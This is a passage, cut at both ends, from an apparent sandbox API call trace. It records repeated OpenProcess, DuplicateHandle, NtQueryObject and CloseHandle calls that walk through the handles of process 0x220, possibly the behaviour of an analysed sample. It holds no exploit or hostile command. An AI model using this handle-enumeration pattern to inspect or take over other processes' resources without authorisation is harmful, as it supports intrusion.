hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.352] CloseHandle (hObject=0x198) returned 1 [0113.352] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.352] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x280, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.352] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.352] CloseHandle (hObject=0x1b8) returned 1 [0113.352] CloseHandle (hObject=0x198) returned 1 [0113.352] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.353] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x284, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.353] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.353] CloseHandle (hObject=0x1b8) returned 1 [0113.353] CloseHandle (hObject=0x198) returned 1 [0113.353] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.353] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x288, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.353] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.353] CloseHandle (hObject=0x1b8) returned 1 [0113.354] CloseHandle (hObject=0x198) returned 1 [0113.354] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.354] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x28c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.354] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.354] CloseHandle (hObject=0x1b8) returned 1 [0113.354] CloseHandle (hObject=0x198) returned 1 [0113.354] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.355] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x290, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.355] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.355] CloseHandle (hObject=0x1b8) returned 1 [0113.355] CloseHandle (hObject=0x198) returned 1 [0113.355] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.355] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x294, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.355] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.355] CloseHandle (hObject=0x1b8) returned 1 [0113.355] CloseHandle (hObject=0x198) returned 1 [0113.356] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.356] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x298, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.356] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.356] CloseHandle (hObject=0x1b8) returned 1 [0113.356] CloseHandle (hObject=0x198) returned 1 [0113.356] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.356] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x29c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.356] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.356] CloseHandle (hObject=0x1b8) returned 1 [0113.357] CloseHandle (hObject=0x198) returned 1 [0113.357] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.357] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.357] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.357] CloseHandle (hObject=0x1b8) returned 1 [0113.357] CloseHandle (hObject=0x198) returned 1 [0113.357] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.357] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.357] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.358] CloseHandle (hObject=0x1b8) returned 1 [0113.358] CloseHandle (hObject=0x198) returned 1 [0113.358] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.358] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.358] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.358] CloseHandle (hObject=0x1b8) returned 1 [0113.358] CloseHandle (hObject=0x198) returned 1 [0113.358] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.358] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.358] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.359] CloseHandle (hObject=0x1b8) returned 1 [0113.359] CloseHandle (hObject=0x198) returned 1 [0113.359] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.359] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.359] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.359] CloseHandle (hObject=0x1b8) returned 1 [0113.359] CloseHandle (hObject=0x198) returned 1 [0113.359] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.359] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.359] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.360] CloseHandle (hObject=0x1b8) returned 1 [0113.360] CloseHandle (hObject=0x198) returned 1 [0113.360] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.360] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.360] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.360] CloseHandle (hObject=0x1b8) returned 1 [0113.360] CloseHandle (hObject=0x198) returned 1 [0113.360] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.361] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.361] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.361] CloseHandle (hObject=0x1b8) returned 1 [0113.361] CloseHandle (hObject=0x198) returned 1 [0113.361] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.361] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.361] CloseHandle (hObject=0x198) returned 1 [0113.361] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.362] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.362] CloseHandle (hObject=0x198) returned 1 [0113.362] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.362] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.363] CloseHandle (hObject=0x198) returned 1 [0113.363] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.363] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.363] CloseHandle (hObject=0x198) returned 1 [0113.363] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.363] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.363] CloseHandle (hObject=0x198) returned 1 [0113.363] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.363] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.364] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.364] CloseHandle (hObject=0x1b8) returned 1 [0113.364] CloseHandle (hObject=0x198) returned 1 [0113.364] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.364] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.364] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.364] CloseHandle (hObject=0x1b8) returned 1 [0113.365] CloseHandle (hObject=0x198) returned 1 [0113.365] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.365] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.365] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.365] CloseHandle (hObject=0x1b8) returned 1 [0113.365] CloseHandle (hObject=0x198) returned 1 [0113.365] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.365] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.365] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.366] CloseHandle (hObject=0x1b8) returned 1 [0113.366] CloseHandle (hObject=0x198) returned 1 [0113.366] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.366] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.366] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.366] CloseHandle (hObject=0x1b8) returned 1 [0113.366] CloseHandle (hObject=0x198) returned 1 [0113.366] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.367] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.367] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.367] CloseHandle (hObject=0x1b8) returned 1 [0113.367] CloseHandle (hObject=0x198) returned 1 [0113.367] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.367] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.367] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.367] CloseHandle (hObject=0x1b8) returned 1 [0113.368] CloseHandle (hObject=0x198) returned 1 [0113.368] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.368] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.368] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.368] CloseHandle (hObject=0x1b8) returned 1 [0113.368] CloseHandle (hObject=0x198) returned 1 [0113.368] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.368] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.368] CloseHandle (hObject=0x198) returned 1 [0113.369] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.369] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.369] CloseHandle (hObject=0x198) returned 1 [0113.369] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.369] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.369] CloseHandle (hObject=0x198) returned 1 [0113.369] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.369] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x300, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.369] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.370] CloseHandle (hObject=0x1b8) returned 1 [0113.370] CloseHandle (hObject=0x198) returned 1 [0113.370] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.370] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x304, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.370] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.370] CloseHandle (hObject=0x1b8) returned 1 [0113.370] CloseHandle (hObject=0x198) returned 1 [0113.370] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.371] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x308, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.371] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.371] CloseHandle (hObject=0x1b8) returned 1 [0113.371] CloseHandle (hObject=0x198) returned 1 [0113.371] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.371] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x30c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.371] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.371] CloseHandle (hObject=0x1b8) returned 1 [0113.372] CloseHandle (hObject=0x198) returned 1 [0113.372] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.372] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x310, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.372] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.372] CloseHandle (hObject=0x1b8) returned 1 [0113.372] CloseHandle (hObject=0x198) returned 1 [0113.372] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.372] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x314, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.373] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.373] CloseHandle (hObject=0x1b8) returned 1 [0113.373] CloseHandle (hObject=0x198) returned 1 [0113.373] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.373] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x318, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.373] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.373] CloseHandle (hObject=0x1b8) returned 1 [0113.374] CloseHandle (hObject=0x198) returned 1 [0113.374] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.374] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x31c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.374] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.374] CloseHandle (hObject=0x1b8) returned 1 [0113.374] CloseHandle (hObject=0x198) returned 1 [0113.374] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.374] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x320, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.375] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.375] CloseHandle (hObject=0x1b8) returned 1 [0113.375] CloseHandle (hObject=0x198) returned 1 [0113.375] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.375] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x324, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.375] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.375] CloseHandle (hObject=0x1b8) returned 1 [0113.376] CloseHandle (hObject=0x198) returned 1 [0113.376] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.376] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x328, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.376] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.376] CloseHandle (hObject=0x1b8) returned 1 [0113.376] CloseHandle (hObject=0x198) returned 1 [0113.376] OpenProcess (dwDesiredAccess=0x40, 